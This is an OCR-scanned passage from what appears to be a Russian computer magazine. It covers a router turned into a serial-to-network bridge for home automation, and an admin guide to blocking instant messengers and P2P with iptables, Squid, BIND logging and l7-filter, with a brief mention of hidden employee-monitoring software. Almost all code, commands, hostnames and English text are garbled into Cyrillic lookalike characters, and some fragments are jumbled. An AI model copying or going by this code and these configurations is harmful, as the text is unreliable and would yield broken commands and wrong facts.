ІипО/рагСІ /орк" » /изг/1оса1/зЬіп/розк- 
шоипк 

сЬтюс! +х /изг/ІосаІ/зЬіп/розк-шоипк 
ііазкіз заѵе 
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ВНУТРИ РОУТЕРА 



іііазітііз сотшіС 
^ІазЬ^з епаЫе 

Файл «розі-тоипі» выполняется системой на автомате после мон- 
тирования дисков, а последние три строки сохраняют изменения во 
встроенной памяти роутера. Не забывай выполнять их, иначе риску- 
ешь потерять данные после перезагрузки! Затем можно устанавли- 
вать пакеты из репозитория, используя простую команду «іркд іпзіаіі 
<имя_пакета>». 

« НАС С ТОБОЙ ИНТЕРЕСУЮТ 
НЕ ЧУЖИЕ ПРОГРАММЫ, 

А СВОИ! КАКЖЕ ИХ ПИСАТЬ? 
ЭТО ОКАЗАЛОСЬ ПРОЩЕ, ЧЕМ 
Я ОЖИДАЛ: ЛИНУКС, ОН 
И В АФРИКЕ ЛИНУКС. И ЕСЛИ 
ТЫ УМЕЕШЬ ПИСАТЬ ПРОГРАМ- 
МЫ ДЛЯ НЕГО, ТО СМОЖЕШЬ 
ПИСАТЬ ИХ И ДЛЯ РОУТЕРА ». 

ПИШЕМ ПРОГРАММЫ ДЛЯ РОУТЕРА 

Но нас с тобой интересуют не чужие программы, а свои! Как же их 
писать? Это оказалось гораздо проще, чем я ожидал. Линукс, он и 
в Африке Линукс. И если ты умеешь писать программы для него, то 
сможешь писать их и для роутера. Разницы никакой. Что для этого 
нужно? Конечно, компилятор. Я компилирую сырцы прямо на роуте- 



ре: долго, зато удобно. Если хочешь делать та к же, то смело ставь па- 
кет «Ьиі 16 гооі». Делается это одной командой «іркд і пзТа II Ь и і ІсІ гооІ», 
если іркд у тебя уже установлен и настроен. Далее становятся доступ- 
ны дсс, д++, таке и все стандартные библиотеки. Надеюсь, ты уже 
знаешь, как их использовать? Я первым делом написал простейшую 
программу: 

НЕНОѴѴОРЮ 

[С1изСег@СШЗТЕК СІизСег] $ саС Ьеііо.с 
#іпс1иЛе <зСс1іо.]т> 

ВИНДОВЫЙ КЛИЕНТ В ДЕЙСТВИИ 
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ІМРТ-ВЫВОДЫ ВНУТРИ ѴѴІ.-5006Р ОТ А51І5 



іпі шаіп ( ) 

{ 

ргіпіі ( "Неііо тлгогісі! \п" ) ; 

} 

[С1изіег@СЫІ8ТЕК Сіизіег] $ дсс Ьеііо.с -о Ьеііо 
[С1изіег@СЫІ8ТЕК Сіизіег] $ . /Ьеііо 
Неііо ѵюзгісіі 

Просто, но эффектно. Осталось воплотить в жизнь мою идею. Для это- 
го нужно написать программу, которая работаете последовательными 
портами и сетевыми сокетами. Алгоритм несложен. Прослушиваем 
ТСР-порт, принимаем входящие подключения по сети. Если отлюбого 
из сетевых клиентов приходят данные, то пересылаем их на ЮАРТ - 
порт. Если, наоборот, из последовательного порта пришли данные, то 
рассылаем их всем сетевым клиентам. 

Последовательные порты в тамошнем Линуксе имеют имена «/беѵ/ 
изЬ/Из/О» и «/беѵ/изЬ/Лз/І ». Первый, как я уже говорил, используется 
для системной консоли. А второй свободен, и мы можем использовать 
его для своих целей. Помнишь, в прошлом номере мы рассматривали 
подключение ЖК-дисплея к СОМ -по рту компьютера через микрокон- 
троллер? Это устройство легко подключить к роутеру, чтобы выводить 
данные на экран, и компьютер для этого уже не нужен. Я так и сделал, 
а затем набрал в консоли две простые команды: 

ПРОВЕРКА ПОРТА 

зііу -сгізсіз 9600 < /сіеѵ/ііз/1 
есію "Неііо шшійі " > /сіеѵ/ііз/1 

Первая команда — установка параметров порта. Вторая — вывод текс- 
та. Экспериментудался, и я увидел на экране соответствующий текст. А 
вот какэто сделать из своей программы? Работать с портами в Линуксе 
мне пришлось впервые, получилось далеко не сразу, и пришлось долго 
экспериментировать с различными параметрами. Приведу код функ- 
ции, которая открывает порт для чтения и записи: 

ОТКРЫВАЕМ ПОСЛЕДОВАТЕЛЬНЫЙ ПОРТ 

іпі ореп_иагі_рогі ( ) 

{ 




ТАКОЙ ВОТ ПОЛУЧИЛСЯ колхоз 



ІПІ 1(1; 

зігисі іегтіоз орііопз; 

ІЛ = ореп (ИАКТРОКТ, 0_ШЖК I 0_Ж)СТТУ | 0_ШЕЬАУ) ; 
іі (ісі == -1) 

{ 

реггог ( " Сап ' 1 ореп рогі " ) ; 
ехіі (1)і 

} 

ісііизк ( 1(1 , ТСІЕЫІ8Н) ; 

Ісдеіаііг ( Ісі , &орііопз) ; 
орііопз . с_с!1ад &= -РАКЕИВ; 
орііопз . с_с11ад &= -С8ТОРВ ; 
орііопз . с_с11ад &= -С8І2Е; 
орііопз . с_с11ад |= С88; 
орііопз . с_с11ад &= -СКТЗСТЗ; 

орііопз . с_111ад & = ~ (ІСАЖЖ I ЕСНО I ЕСНОЕ | ІЗІС) ; 
сізеіозреесі ( &орііопз , В9600); 
іезеіаііг ( 1(1, ТСЗАЫОШ, &орііопз); 

ІСПІІ (Ісі, Е_8ЕТЕЬ, ЕШЕЬАУ) ; 

ргіпіі ( "ЦАКТ (%з) рогі орепесАп" , ІІАКТРОКТ) ; 
геіигп Ісі; 

} 

Тут константа «ІІАВТРОВТ» — путь к файлу-устройству, который 
ассоциируется с портом. В данном случае это «/беѵ/Лз/І ». Собствен- 
но функция <Лореп(]» открывает порт, далее просто идет изменение 
различных параметров. В примере используется скорость в 9600 
бод, один стоповый бит; контроля передачи данных нет. Запись и 
чтение производятся функциями «ѵѵгТеО» и «геабО». Как работать 
с сокетами, наверное, многие уже знают, — для остальных приведу 
функцию, которая открывает порт и подготавливает его для принятия 
соединений: 

СОЗДАЕМ СОКЕТ И ПРОСЛУШИВАЕМ ЕГО 

іпі ЗіагіЬізіеп ( ) 

{ 

іпі зоск; 
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іпк і — 1 2 

ік ((зоск = зоскек (РЕ_ШЕТ, ЗОСК_8ТЕЕАМ, 0)) < 0) 

{ 

реггог ( " Сап ' к сгеаке зоскек"); 
гекигп -1 ; 

} 

Ьгего(&за, зігеок ( за) ) ; 

за . зіп_каші1у = АЕ_ШЕТ; 

за.зіп_рогк = ккопз (ССРОЕТ) ; 

за . зіп_ас!с1г . з_ас!с1г = Ькопі ( ШАББЕ_АЫУ ) ; 

ік (ЪіпсЦзоск, (зкгиск зоскасісіг *)&за, зігеок за)) 

{ 

реггог ( " Сап ' к Ъіпсі рогк " ) ; 
сіозе ( зоск) ; 
гекигп -1 $ 

} 

ік ( Іізкеп ( зоск, 15)) 

{ 

реггог (" Сап ' к Іізкеп рогк ") ; 
сіозе ( зоск) ; 
гекигп -1 ; 

} 

ік (іоск1(зоск, ЕІСЖВІО, &і) ) 

{ 

реггог (" Сап ' к зек поп-Ыоскіпд шосіе"); 
сіозе ( зоск) ; 
гекигп -1 ; 

} 

ргіпкк ( "Ьізкепіпд оп рогк %и\п" , ССРОЕТ) ; 
гекигп зоск; 

} 

Константа «ССРОКТ» — это номер порта, на который будут при- 
ниматься соединения. Обрати внимание, что я перевожу сокет в 
неблокирующий режим (хочу максимально упростить код]. Вызовом 
этих двух функций я начинаю работу программы. Теперь в бесконеч- 
ном цикле необходимо проверять наличие данных с обеих сторон и 
передавать их дальше. Код простой, но слишком длинный для статьи 
поэтому ищи его на диске. В итоге роутер стал своеобразным пере- 
ходником между сетью и СОМ-портом. 



КЛИЕНТСКИЕ ПРОГРАММЫ 

Протокол дляобщенияс «умным домом» стал очень сложным, он 
слишком заточен под мои нужды и описывать его тут нет смысла. 
Основную клиентскую программу я написал для ѴѴіпбоѵѵз, используя 
при этом Вогіапсі ОеІрЫ. Получилась софтина, которая запускается 
вместе с системой и висит в трее. При этом каждые несколько секунд 
она подключается к серверной программе, которая запущена на 
роутере. Когда соединение установлено, происходит обмен данными: 
компьютер узнает, какие устройства присутствуют и какие включены, 
какая температура в комнате и т.д. Остальные функции изменились 
незначительно, их я описывал в начале статьи. Идей при этом не 
меньше, реализовать та к можно очень многое. 

БОНУСЫ РОУТЕРА 

Если все это безобразие работает под Линуксом, значит, можно ис- 
пользовать множество других утилит, портированных на этот роутер. 
Самое очевидное — это веб-сервер! Я использую «ІідЫірсІ», он доста- 
точнолегкий и умеет все, что нужно. Его нетрудно подружить с РНР. 

А что мешает написать клиент для «умного дома» на РНР? Именно 
так я и сделал, используя функции для работы с сокетами. Это дало 
возможность управлять домом с любого устройства, на котором есть 
веб-браузер, например, мобильного телефона. Даже не пришлось 
переносить код на Симбиан. 

Также я воспользовался утилитой «ггсКооІ», — это очень интересная 
программа, которая позволяетзаносить информацию в своеобразную 
базу данных и рисовать по ней графики. Мне было любопытно, и я 
реализовал вывод графиков с данными о температуре за прошед- 
шие сутки, неделю и т.д. Получилось весьма симпатично. Планирую 
еще сделать, чтобы отслеживалось движение в комнате, и роутер 
присылал мне 5М5, если вдруг в комнату кто-то вошел. Своеобразная 
самодельная сигнализация. 

КОФЕ В ПОСТЕЛЬ 

В статье я хотел показать тебе, что при сочетании своеобразного 
«железа» и софта можно получить очень интересные результаты. 
Обыкновенный роутер можно даже научить варить кофе, главное 
— уметь программировать под необычные платформы и грамотно 
согласовывать «железо». Очень надеюсь, что ты вдохновишься этой 
статьей и сделаешь что-нибудь гораздо круче, т 
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_55НЗР1 РР- 

/ 55НЗК1РРгаСМАИ.С0М / 

Серпом 

по аськам 

Режем ІМ Р Зкуре, Р2Р и все остальное 

Очень многие любятна работе общаться по аське, зависать в «Одноклас- 
сниках», качать файлы, в общем, заниматься всем, чемугодно, нотолько 
не своими непосредственными служебными обязанностями. Естествен- 
но, рано или поздно это надоест начальству, и решение по блокировке 
всего и вся претворять вжизнь придется тебе какадмину. 



ИЗУЧАЕМ ВОПРОС Вообще говоря, процесс 
блокировки доступа пользователей к ІМ-сетям 
довольно прост: достаточно указать в пакет- 
ном фильтре пару правил, и клиент просто не 
сможет подключиться к серверу. Такой метод 
помогает только в 90% случаев, остальные 10% 
приходятся на умников, знающих о том, что се- 
годня предлагается большое количество утилит 
и сервисов, задача которых — помочь задавлен- 
ному админскими правилами пользователю 
вырваться на свободу. Для этого используется 
подключение через стандартный Ьнр-порт 
или шифрование соединения, что не позволяет 
просто взять и отбросить пакет или просмот- 
реть его содержимое. Универсального решения, 
скорее всего, не будет никогда. Это даже дела- 
ет нашу работу интереснее. Так как мы пока не 
знаем, что конкретно искать, запускаем Щрбшпр 
без параметров: 

$ зисіо Бсрсіитр -і еЫзО 

А вот и наша аська: 

21:33 : 55. 687 042 ІР 10.10.10.10.33 018 
> 64.12 .26. 150. аоі: . аск 11334 теіп 

63920 

Вывод нам дал, как минимум, два полезных па- 
раметра — ІР-адрес сервера ІС(2, к которому под- 
ключается клиент, и название протокола. Номер 
нужного порта можно узнать командой «§гер аоі 
/еіс/ргоіосоіз», запустив ГсрДитр с ключом '-п' 
или просто спросив у гугла. Мы ищем аську, по- 
этому пишем: 

$ зисіо Есрсіитр -і екЪ.0 сізЕ рогЕгапде 
5190 
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Теперь в расставленные сети будет попадаться 
только то, что нужно. Аналогично отлавливают- 
ся данные и по остальным ІМ-сетям. Все клиенты 
ІС(2, в том числе и рамблеровские, для подключе- 
ния к серверу по умолчанию используют адрес 
Іочіп.ісд.сот и порт 5190. В асечных рекоменда- 
циях сказано, что в случае недоступности 5190 
подключаться можно и к порту 443. Продолжаем 
исследование и смотрим, что мы можем узнать о 
домене: 

$ козЕ Іодіп . ісд . сош 

Іод іп . ісд . сот із ап аііаз іог Іодіп. 

шеззадіпд . аоі . сот. 

Іодіп. теззадіпд. аоі . сот Таз аскігезз 
64.12.161.153 

Вывод показывает, что 1о§іп.ісд.сот является 
псевдонимом для другого имени, и, подозреваю, 
далеко не единственным. Его также не мешает за- 
блокировать в правилах. Как видишь, ситуацию 
с ІС(2 и многими другими сервисами немного 
усложняет наличие большого количества алиа- 
сов и подсервисов, поэтому приходится искать и 
прикрывать все возможные варианты. Еще одна 
полезная команда — сИ§ — даст наиболее полную 
инфу по любому домену Іочіп.ісд.сот) . 

В первом случае заблокировать доступ очень 
просто. Сначала режем по порту и затем для вер- 
ности добавляем правило для домена, если кто-то 
захочет нас надуть (все примеры буду приводить 
для іріаЫез, но при необходимости их легко мож- 
но переписать для любого другого пакетного 
фильтра): 

ірЕаЫез -А ЕОКШАКБ -р ТСР --БрогЕ 
5190 Б КОР 

ірЕаЫез -А ОБТРБТ -сі Іодіп. ісд. сот 



-д КЕБЕСТ 

ІрЕаЫез -А ОБТРБТ -сі ісі. гатЫег . ги 
~3 КЕБЕСТ 

Использование доменного имени с одной сторо- 
ны более универсально, так как ІР всегда может 
измениться, но с другой стороны — «в лет» найти 
все алиасы сложновато, поэтому нелишней будет 
блокировка и по адресу. Тем более, разработчики 
постоянно идут навстречу клиенту и предлагают 
сервисы вроде \ѵуѵш.ісд.сот/ісд2чо. позволяю- 
щие общаться через веб-интерфейс. Хотя именно 
этот вариант легко блокируется, достаточно за- 
крыть доступ к диапазону ІР (он виден в выводе 

сВД: 

ІрЕаЫез -А ОБТРБТ -сі 64.12.0.0/16 
-3 КЕБЕСТ 

ІрЕаЫез -А ОБТРБТ -сі 205.188.0.0/16 
-3 КЕБЕСТ 

Но даже неискушенный юзверь найдет в 
интернете еще с десяток реализаций ісд2§о 
(а-ля ѵѵѵѵѵѵ.тееЬо.сот) . предлагающих кон- 
нект к ІМ-системе в обход ограничений. Вот 
здесь уже придется повозиться. Не буду му- 
чить детальным выводом ісрбитр'а, скажу 
только, что УаЬоо! Меззеп^ег использует 
ТСР-порты: 5000-5001,5050,5100 и ШР-пор- 
ты: 5000-5010, М5И — 1863, ІаЬЬег/СіаІк 
— 5222, 5223, ІКС обычно 6667-6669, Маіі- 
Агент работает по портам: 2041, 2042. Особо 
не раздумывая, сделай запрет на все! Помни, 
что некоторые сервисы (например, узкопро- 
фильные ІКС и т.п.) могут менять порты по 
умолчанию. Правила для этих сетей строим 
по аналогии с предыдущим. Например, для 
УаКоо Меззеп^ег: 
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ірбаЫез -А ЕОШАКБ -р ТСР --брогб 5000:5001 -3 КЕбЕСТ 
ірбаЫез -А ЕОШАКБ -р ТСР --брогб 5 050 -3 КЕбЕСТ 
ірбаЫез -А ЕОЕМАКЕ -р ТСР --брогб 5100 -3 КЕбЕСТ 
ІрбаЫез -А ЕОКМАКБ -р ЕГОР --брогб 5000:5010 -3 КЕбЕСТ 
ірбаЫез -А ЕОКШАКБ -б сз .уабюо . сот -3 КЕбЕСТ 
ірбаЫез -А ЕОКШАКБ -б з с за .уабюо . сот -3 КЕбЕСТ 

Из дополнительных мер можно посоветовать перенастроить свой 
ИИ5-сервер, чтобы пользователь вместо правильного адреса получал 
изначально нерабочий. К слову, анализ ИИ5-запросов в сети может 
дать не меньше информации к размышлению, чем отлов пакетов с 
Щрбшпр. Поскольку мой БИЗ-сервер крутится на ОреиВЗБ, приведу 
пример для ВІИБ 9.3.4: 



сЬаппеІ диегіез_сбі. { 

// задаем лог-файл (путь указывается относительно 
сАгооЕ- окружения) , количество ротаций и его размер 
бііе " /Іод/диегіез . Іод" ѵегзіопз 5 зізе Ют; 

// устанавливаем уровень журналирования (нам подойдет 
сІеЬид, либо іпбо) 
зеѵегібу беЪид; 

//к каждой записи добавляем метки с категорией, уровнем 
журналирования и временным штампом 
ргіпб-сабедогу уез; 
ргіпб-зеѵегібу уез; 
ргіпб-біте уез; 

} ; 



$ зисіо ѵіт /ѵаг/патесі/еіс/патесі.сопі 

Іоддіпд { 

/ / определяем канал — место назначения журнальных запи- 
сей 



// фиксируем клиентские обращения 
сабедогу диегіез { диегіез_сЬ; } ; 
сабедогу гезоіѵег { диегіез_сЬ; }; 



}; 



МІРКО ЕМРШУЕЕ 
МОЫІТОР 

Представим такую ситуацию: политикой компании разрешено ис- 
пользовать ІСО только менеджеру по продажам, но он целый день 
болтает в аське с друзьями, вместо того, чтобы разводить клиентов 
на заказы. При помощи программ, описанных в статье, это опре- 
делить нельзя. Поэтому возможен и альтернативный подход — на- 
блюдение. На рабочем месте устанавливается программа, которая 
перехватывает все вводимые сообщения, контролирует запуск при- 
ложений и работу в интернете. Начальство в этом случае получает 
отчеты по всем действиям пользователя, включая снимки рабочего 
стола, и может оценить эффективность работы сотрудника. Пример 
такой программы — МІРКО Етріоуее Мопііог (штѵ.тірко.ги) . 
Она разработана российской компанией, имеет локализованный 
интерфейс и довольно проста в использовании. Программа может 
быть запущена в скрытом режиме. В этом случае отследить ее работу 
штатными системными средствами невозможно. 



ЦЕПКИЙ ЗАХВАТ 

По умолчанию 17-Іікег просматривает лишь первые 10 пакетов или 
12 Кб каждого соединения, чего обычно более чем достаточно. При 
необходимости можно указать свое значение, прописав его в /ргос/ 
пеи/1ауег7_питраскещ : 

$ зибо зЬ -с " есбю 16 > /ргос/пеб/1ауег7_питраскебз " 

Пример блокировки ІС(2 для раскеі: Якег 

$ зибо ѵіт /ебс/рб.сопб 

баЫе <ІС(2Везбз> сопзб { 64.12.0.0/16, 205.188.0.0/16 } 

Ыоск оиб Іод диіск оп $ехб_іб ргобо { бср, ибр } \ 
бгот апу бо <ІССЮезбз> 

Ыоск оиб Іод диіск оп $ехб_іб ргобо { бср, ибр } \ 
бгот апу бо апу рогб { 4000, 5190 } 
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Сенс Прапкд Кнд ЭЯКАЛДКН Настройка Спрдрк» 

@ : ~$ Побі Іодіп. ісд. сот 

Іодіп. ісд. сот іб ап аІіаБ Тог Іодіп. теББадіпд. аоі * сот. 

Іодіп. іпеББадіпд. аоі . сот Гіэб эййгобб 64*12*161*153 
@ йід Іодіп. Ісд. сот 

■ <о> ОіС 9.4.2 «» Іодіп. ісд. сот 
; ; ді оЬа! орі і опб : р г і пі с тсі 
;; Соі апБнег: 

;; -»НЕА0ЕВ«- ореоле: ОУЕВУ, БІаТив: МОЕВВОВ, Ій: 12519 

;; Падь: дг гй га; диЕВѴ: 1, АІ^іІЕВ: 2, АУТНОВт: 4, А00ІТІ0МАІ_: 4 



; ; дУЕ5ТІ0И 5ЕСТІ0И : 



; Іодіп. ісд. сот. 




ІЫ 


А 




;; ДМ5ИЕВ 5ЕСТІ0М : 


Іодіп. ісд. сот. 


94 


ІИ 


СИАМЕ 


Іодіп. тезБадіпд. аоі . сот 


Іодіп. теэзадіпд. аоі .сот 


. 48 


ІИ 


А 


64.12.161.153 


;; АУТНОЯІТѴ 5ЕСТІ0М : 


теээадіпд.аоі .сот. 


522 


ІМ 


N5 


ЙП5-07.П5.ЭОІ .сот. 


теззадіпд . аоі . сот . 


522 


ІМ 


N5 


йгг5-Ѳ2.п&.аоХ .сот. 


теззадіпд . аоі . сот . 


522 


ІМ 


N5 


йпз-ѲІ.пз.аоХ .сот. 


теззадіпд . аоі . сот . 


522 


ІМ 


N5 


йпз-Об.пв.ао! .сот. 


;; А00ІТІ0МАІ_ 5ЕСТІ0М: 


Йп5-06.п5.ао1 .сот. 


9054 


ІН 


А 


149*174*54*153 


ЙП5-01.П5.3ОІ .сот. 


2341 


ІИ 


А 


64.12.51.132 



0 



ИСПОЛЬЗУЕМ Н05Т И йІС, ЧТОБЫ ПОЛУЧИТЬ ИНФОРМАЦИЮ 
О СЕРВЕРАХ ІСО 




• Подробнее о на- 
стройке 5риіб можно 
прочитать в номерах 
т за май-июль 2008 
года. 

• Чтобы заставить 
ЫеЧіІіег глубже 
заглянуть внутрь 
пакетов, необходи- 
мо установить патч 
17-Шег. 




НТТР://ѴѴѴШ 



■ ■ 

> Ііпкз 

• ЫеТбі И;ег/І ріа Ыез — 
пеШНегогд . 

• 5диіб — ѵѵѵѵѵѵ.здиіб- 
сасбе.огд . 

• 17-Шег — 7-тіег. 
гіпек 

•ІРР2Р— зр2р.огд . 

• Р2РѴѴаІІ — ѵѵѵѵѵѵ. 
[оѵуіЬ.согп/р2рѵѵаЦ . 



Перезапускаем демон патесі и включаем журналирование 
БЫЗ-запросов: 

$ зибо гпсіс геіоаб 
$ зибо гпсіс диегуіод 

Смотрим в логи: 

$ зибо баіі -і /ѵаг/патеб/іод/диегіез . Іод 
30-бип-2009 16:22:15.036 гезоіѵег: бебид 1: 

сгеабеіексЬ. : пз.таіІ.гиА 

ЗО-бип-2009 16:22:35.179 диегіез: іпіо: сііепб 
192 . 168 . 1 . 21#64773 : ѵіем іпбегпаі : диегу: ѵллплп 
тееЬо . сот Ш А + 

ЗО-бип-2009 16:22:35.868 диегіез: іпіо: сііепб 
192 . 168 . 1 . 21#63341 : ѵіем іпбегпаі : диегу: 

3 з . тееЬо . сот ІЫ А + 

В дальнейшем борьба будет вестись по принципу «увидел что- 
то новое в пейГагЛсрбитр /диегіез. 1о§, проанализировал и до- 
бавил правило». В репозиториях дистрибутивов полно всяких 
полезных утилит. Например, ірЩіаіе выводит ТОР-образную 
таблицу по соединениям. Чтобы упростить задачу, можно ис- 
пользовать фильтр портов или адресов: 

$ зисіо іркзбабе --бзкрб-:Еі1кег=5190 

Так мы увидим все попытки подключения к асечному порту. 

ПЕРЕКРЫВАЕМ КИСЛОРОД СРЕДСТВАМИ КАЛЬМАРА 

Как только основные порты для связи с ІМ-сервером будут пе- 
рекрыты, пользователи начнут подключаться через стандарт- 
ный порт 80/443 или через прокси. Здесь ірііаЫез в том виде, в 
котором он есть, нам уже не поможет, но не забываем о сущес- 
твовании ЗдиісГа — он работает на прикладном уровне и умеет 
анализировать передаваемую информацию. Надеюсь, к этому 
времени кальмар у тебяуже настроен, и все пользователи через 
него выходят в интернет (подробнее о настройке Зциісі смотри 
в летних номерах ін: за 2008 год) . Сам принцип блокировок ос- 
тается тем же — запрещаем доступ к определенным адресам. 
Итак, открываем здиісі.сопіи дописываем: 







ВЕБ-АСЬКА ІС0200 

$ зисіо ѵіт /еіс/здиій/здиій.соггі 

// Указываем свой адрес 

асі абтіп зге 192.168.10.10 

// аіт/Ьккр — МІМЕ-тип ІСО 

асі аіт_ЬРРр гер_тіте_Ьуре -і /ч аіт/ЪРРр$ 

// Блокируем всех, кроме себя любимого 
йРбр_гер1у_ассезз бепу аіт_кккр ! абтіп 
/ / Ну и чтобы наверняка, перекрываем доступ к 
серверам ІСО 

асі ІСО-Мезз бзб 64.12.200.89/32 

205.188.153.121/32 205.188.179.233/32 

64.12.161.153/32 64.12.161.185/32 
НДДр_ассезз бепу ІСО-Мезз ! абтіп 

Учитывая, что резать придется и другие ІМ-сети, а также 
бесплатные почтовики вроде таііги. проще для всех блоки- 
руемых адресов создать отдельный файл, подключив его в 
правиле: 

асі іт_пебз зге " /изг/1оса1/ебс/здиіб/ісд_ 
пебз . асі " 

йДДр_ассез бепу іт_пебз 'абтіп 

Остается только почаще заглядывать в отчеты 5аг§ (анализа- 
тор лог-файлов 5дшб) и проверять, все ли лазейки прикрыты. 

ДОПИЛИВАЕМ ІРТАВІ.Е5 Все сделано правильно, нужные 
порты и адреса заблокированы, но хитрые пользователи все 
равно нашли способ обойти преграды. Снова возвращаемся 
на нижний уровень 051 к нашему ірііаЫез. Начиная с версии 
2.6.14, в состав ядра включен модуль (ранее он был в ращЬ- 
о-тагіс-п§), позволяющий заглянуть внутрь пакета и постро- 
ить правило, опираясь на наличие/отсутствие определенных 
строк. Модуль называется 5Ггіп§ (хГ_5Ггіп§). В большинстве 
современных дистрибутивов все необходимое уже есть, и пе- 
ресобирать ничего не придется. Чтобы проверить, достаточ- 
но просмотреть список файлов в каталоге модулей: 

$ 1з /1іЬ/тоби1ез/2 . 6 . 24-24-депегіс/кегпе1/ 
пеб/пебіі1бег/хб_збгіпд . ко 

С его помощью задавать правила довольно просто: 

$ зибо іркаЫез -А ЕОКЭДАКБ -т зкгіпд --зкгіпд 
"ісд. сот" \ 

--аідо ктр --ко 65535 -д БЕОР 

Теперь, если в пакете обнаружится соответствующая строка, 
в доступе будет отказано. Так же можно резать и все осталь- 
ное, к чему не лежит душа начальства/админа. Например, 
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>> ЗѴЫ/АСК 




УЗНАТЬ ВСЕ ПРОИСХОДЯЩЕЕ В СЕТИ ПОМОЖЕТ 
ТСРБІІМР 



Гіи М»і *ці ІЧ М ІІ ІІкіик» (МЫ 

кегпеі -2, 6.0- 2. 6 , 8 . 1 Лэуёг? -в . 9 . 2. раісіі кегггеі 2.6 18 2.6 . 19 Хауег? ■ 2.9.рэ№і 
кегпе\-г,б, 11-а, а, 12-х*уег7-1, <і, гээіеь кет*Ь 2 .б . 20 2 , 6 . гыауег7-2. іе . і. раісп 

кегпег-а,6,1Э-а,$.1в-1ауег7-г.2,раЕсн кегпеіг г 6,2а-2.6,а4-гауег7-2.Ш,раі:с^ 
КегпеХ'2, 6, 17-Хауег7-2. 3 , раісл кегп*Ь2.6 . 9-2.6. 18Лауег7~ 1, 2.раісП 

@ :/У5г/5гс/ипи*& рвісЬ рі < , /пеіШіег.ХэуегТ. ѵ3.2І/Гэг_.оХ<іег_кегпеІ 

2 -2 . Б , 24 Л зуег? -2 , 0» „ раіСН 
раіеИіпд те гаѴпеітіегуКеолІід 

раісЬ: *"■ Свп'і гепзте те /ігяр/раКяІВхг іо пеі/пеітіег/кеопіід : Регтіззіоп бепі 
Ф :/уйг7$г с/Игсихі эийР (№ісИ -рі « , ,/і^тХіег-іэуег7"ѵ2,21/гог_йХйег_к 

2 < & . 22- 2. & < 24 - хауе г 7 . 2 18 . рЭІСЬ 
рвгспіпд те пеі/пеітіег/кеміТід 
раісЫпд те пеі/пеітіег/ИэКете 
раіснілд те і^і/п^Шіегт^ауег7.с 

рдесЫпд те пн/УтШиег/гееехр/гвдех^е 
раіепіг»д те пеі/пеітіег/гэдехр/гедехр.Гі 
ряіеЫпд Ше пеі/пеітЬег/гедезф/гедяидіс.Ь 
рвісмпд те теі/петиег/гедехр/гедіііЬ.е 
раіеЫлд те і№І/п*тШг/гі*_сотіг4*к_&йг*,і 
раіспіпд те пеі/петііег/пт_«ппігйск_зіапйвІопе.'С 
раісНіпд те іпсІиРе/пеі/пеі^іХІгег/пТ_соппігв(Ск,Н 

рвісйіпд ш е ігісі мРе/ипих/пеі ш і ег/ *і_і ау*г7 ч п 

ПАТЧИМ ЯДРО 



пользователи любят на шару качать файлы на работе, посему блокируем 
Ооѵѵпіоаб Мазхег: 



$ зибо ірЕаЫез -А ЕОКѴ/АКБ -ш зТгіпд --зЕгіпд --аідо ктр \ 
" БошіІоабМазТег " -3 КЕбЕСТ 



Подобным образом можно закрыть доступ к «Одноклассникам», «ВКон- 
такте» и прочим ресурсам. Параметр '-а1§о' обязателен, — он опреде- 
ляет алгоритм, который будет использован для проверки совпадения 
строк. Здесь возможны варианты — ктр (от КпихЪ-Ргаіт-Моггіз) или Ът 
(от Воуег-Мооге). В подробности работы алгоритмов вдаваться не буду, 
скажу только, что Ът считается одним из наиболее быстрых среди алго- 
ритмов сравнения в «простых» ситуациях. А ктр является усовершенс- 
твованным вариантом Ът, оптимизированным для разбора сложных 
строк. Кстати, модуль зтп^ поддерживает и параметр '-Ъех-зХгіп^', что 
позволяет производить поиск в бинарном формате. К сожалению, это 
все, что можно сделать, используя стандартные возможности ірхаЪІез. 
Далее необходимо обращаться уже к другим решениям. 



БЛОКИРОВКИ СЕДЬМОГО УРОВНЯ Существует несколько проектов, кото- 
рые предоставляют больше возможностей по контролю . Это 17-Шіег ( 7-Шгег. 

зГ.пеП , 2огр Гѵѵѵѵѵѵ.ЪаІаЪіРсот/пеімюгк-зесигііу/гогр-еаЕеѵѵау) , ІРР2Р (ірр2р. 
ог^г) и Р2РѴѴаД Гхѵѵѵѵѵ.1охѵі:Ь.сот/р2р\ѵат . Последние два проекта, каквидно 




(Л :-/Х7 рГйійеМй-ЗШЭ-ѲБ 2ВІ шей іріаЫйй -А ЕОКНАИЗ ИрдУЕЦЕ --фіеііе-іШЯ ' 

[$уйй] р&$$могй ірг ; 

0 -/17-ргеіосои-2009-05-285 5Уск> \7-ТШ*г -ѵѵ -Г /еісД7_тіег, сопі 



‘'■НАЙГІШ**** 

Нсіііігг -ик* ір_сопп!.гасіі_пеШпк пог пГ_согіпігаск_гкЕХіпк ксгпеХ 
яюсіиіеі агс іоасісй, ипіек іие-бе ТслЕиг-е^ аге сотрНсгі іпіе уоиг 
кеггчі, [Яеа$е Х*ай енп^ апй пи 17-Гіи«г адаы. 

іі(е«рипд ГР геаа солПдугэиоп Тгрт /еіс/17_тіег.сопТ 
тніріігч іо Іма раііегл Іго* /еісД7'ргоіоесІз/ргоіоеоХ5/з»п.раі 
рвСІ« ГПя: ■ “МП* 1 \ . [ Э “ ^ ] ' 
еиад&Я спадет 
Айсіегі: 5,^1 ШГкаБ 

АііврІХпд ір ІоасІ раііегг ТГО* /вІсД7-ргріссдІ5/ргоіо[;оІ5/а1т. раі 
раггета- А (\* [\к$1\хСіг] . -ххібЗ^яѲіцѵ'^яеі. ?. ?, ? . Пхві) | Пэрепі[№_5Адпі>гі г 1 
еНэд*=9 с* 1 * 95 = 11 
а мей: аія мігкз4 

№Г«Т1ІМК ап№>лг«: Хпѵ&ІІй агдитепі 

(5 :-Л7-рГОІвСо16-29Ѳ9 Ѳ5 2ВІ | 

РАБОТА Ь7-РІЬТЕР В ІІ5ЕР5РАСЕ-РЕЖИМЕ НЕ- 
СКОЛЬКО ОТЛИЧАЕТСЯ ОТ КЕКЫЕЬ-ВАРИАНТА 

из названия, специализируются на идентификации Р2Р-сетей. Задача 2огр 
(Мобиіаг Арріісагіоп Ьеѵеі СаХехѵау) — защита приложений от направлен- 
ных атак. 2огр представляет собой прозрачный прокси, который выступает 
посредником при работе клиента и сервера. Зная особенности протоколов 
и на основании настроек, он принимает решение о необходимости продол- 
жения текущего соединения. Его главная фича — возможность проверки 
защищенных соединений (НТТР5, РОР35, ІМАР5 или 55Н), что недоступно 
многим ГО5. Версия СРЬ поддерживает только протоколы (НТТР/1.1, РТР, 
55Ь, йп§ег, хѵЪоіз и ХеІпеХ) , поэтому 2огр нас пока не интересует. 

